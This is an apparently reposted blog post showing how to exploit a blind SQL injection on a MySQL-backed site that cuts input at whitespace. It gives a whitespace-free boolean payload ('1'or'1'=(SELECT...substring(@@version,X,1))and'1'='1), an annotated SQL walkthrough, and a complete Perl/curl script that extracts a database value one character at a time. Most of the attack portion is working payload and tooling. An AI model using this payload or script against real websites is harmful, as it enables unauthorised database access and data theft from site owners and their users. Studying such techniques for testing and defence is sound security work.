Blind

https://vikasprogrammer.tumblr.com/post/49251154907/blind-sql-injection-without-white-spaces

Blind SQL Injection without White Spaces

So, you just found out that requesting www.example.com/?id=1' throws a nice MySQL error:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''id=1'' ORDER BY page_id desc LIMIT 1' at line 1

Happy? Well, not yet!

Looking closely at the error and taking just the fragment between 'near' and 'at line 1':

'id=1'' ORDER BY page_id desc LIMIT 1

This means that whatever I input ends up inside 'id=<myinput>'. Strange!

So, to break out of 'id=<myinput>', I tried ?id=1' or '1'='1, and interestingly:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''id=1'' ORDER BY page_id desc LIMIT 1' at line 1

And, more interestingly, no mention of my beloved '1'='1. At this point I was basically angry.

I thought to myself, maybe it's removing the spaces, so I tried ?id=1'or'1'='1 and voila! No errors. (Strictly speaking, the error above suggests the input is cut off at the first space rather than having its spaces stripped: had the spaces merely been removed, 1' or '1'='1 would have arrived as 1'or'1'='1 and produced no error. Either way, the payload has to contain no whitespace at all.)

And moments later, :(

Now I had to build a query that distinguishes a true condition from a false one, AND contains no whitespace.

[FAST FORWARD]

After a long list of tries, I got this:

/?id=1'or'1'=(SELECT(_utf8'.')=substring(@@version,X,1))and'1'='1

Here '.' is the placeholder for the character being tested, and X is the position counter that walks over the characters of the output (substring is 1-based, so X=1 is the first character). The inner SELECT evaluates to 1 when the guessed character matches and to 0 otherwise, and the outer '1'=(...) turns that into the WHERE condition, so the row only comes back on a match. As we know, with X=2 the output has to be '.' (a MySQL version string looks like 5.x.x), i.e. a TRUE condition: in this case I got NO "page not found" error, and if I put anything else in place of '.', I got the "page not found" error. That's it! Game over!
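To make the oracle concrete, the following is an added example; it is not part of the original post. The post only shows the tail of the query after 'id=' as echoed in the MySQL error, so the table and column names used here (pages, slug, page_id) and the sample version string are assumed. It shows the whitespace-free payload dropped into a query of that shape, how the WHERE clause collapses to true or false depending on the guessed character, and the end-of-string case the extraction loop relies on:

```sql
-- Added example, not the post's own code. Table/column names (pages, slug,
-- page_id) are assumed; the post only shows the query tail from the error.

-- Presumed shape of the vulnerable query for the benign input ?id=1:
SELECT * FROM pages WHERE slug='id=1' ORDER BY page_id DESC LIMIT 1;

-- The same query with the final payload substituted and X=2 (second character
-- of @@version). Nothing injected contains whitespace: quotes and parentheses
-- are enough for the lexer to separate the tokens.
SELECT * FROM pages
WHERE slug='id=1'or'1'=(SELECT(_utf8'.')=substring(@@version,2,1))and'1'='1'
ORDER BY page_id DESC LIMIT 1;

-- Why it works. AND binds tighter than OR, so the clause reads
--   (slug='id=1') OR ( '1'=(SELECT ('.'=substring(@@version,2,1))) AND '1'='1' )
-- The inner SELECT yields 1 when the guess matches and 0 otherwise, and
-- '1'=1 is true while '1'=0 is false, so the row is returned only on a match.
-- The same logic against a one-row derived table and a fixed version string
-- (constructed sample data standing in for the real table and @@version):

-- a correct guess: '.' is the 2nd character of 5.1.1-Ubuntu
SELECT slug FROM (SELECT 'about' AS slug) AS pages
WHERE slug='id=1'or'1'=(SELECT(_utf8'.')=substring('5.1.1-Ubuntu',2,1))and'1'='1';

-- a wrong guess at the same position
SELECT slug FROM (SELECT 'about' AS slug) AS pages
WHERE slug='id=1'or'1'=(SELECT(_utf8'x')=substring('5.1.1-Ubuntu',2,1))and'1'='1';

-- a guess past the end of the 12-character value: substring() returns '',
-- which equals no printable character, so every guess at this position fails
SELECT slug FROM (SELECT 'about' AS slug) AS pages
WHERE slug='id=1'or'1'=(SELECT(_utf8'.')=substring('5.1.1-Ubuntu',13,1))and'1'='1';
```

On a MySQL server the first derived-table query returns the single row 'about' (the page is found), while the second and third return no rows (the "page not found" branch); the third case is exactly what lets an extraction loop detect that it has run past the end of the value. On MySQL 8.0 the _utf8 introducer still works but is deprecated in favour of _utf8mb4.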

I wrote a quick Perl script that iterates over every character of the output, trying all printable ASCII characters at each position. Profit!

Perl Script: http://pastebin.com/ixB5d90N

#!/usr/bin/perl
# Script to iterate over the found SQL statement for blind SQLi
use strict;
use warnings;

$| = 1;                     # unbuffered, so each recovered character prints at once
my $base = 'http://example.com/';
my $cmd  = '@@version';     # expression to extract, one character per request
my $j    = 1;               # substring() positions are 1-based

while (1) {
    my $done = 1;
    # Printable ASCII from '*' (42) to '~' (126). Characters below 42 include
    # space, ', #, % and &, which would break the payload or the URL, so they
    # are skipped (as in the original script).
    for my $i (42 .. 126) {
        my $ch  = sprintf('%%%02X', $i);   # percent-encode the candidate character
        my $url = "$base?id=1'or'1'=(SELECT(_utf8'$ch')=substring($cmd,$j,1))and'1'='1";
        # List-form open runs curl without a shell, so nothing in $url is
        # re-parsed (the original backtick call let ` and \ reach the shell).
        open(my $fh, '-|', 'curl', '-s', '--max-redirs', '0', '-i', $url)
            or die "cannot run curl: $!";
        my $resp = do { local $/; <$fh> } // '';
        close($fh);
        # The "page not found" response contains "exist"; when it is absent the
        # guessed character is correct.
        unless ($resp =~ /exist/) {
            print chr($i);
            $done = 0;
            last;
        }
    }
    last if $done;          # nothing matched: we are past the end of the value
    $j++;
}
print "\ndone\n";

Output:

$ perl blind-version-test.pl

5.1.1-Ubuntu
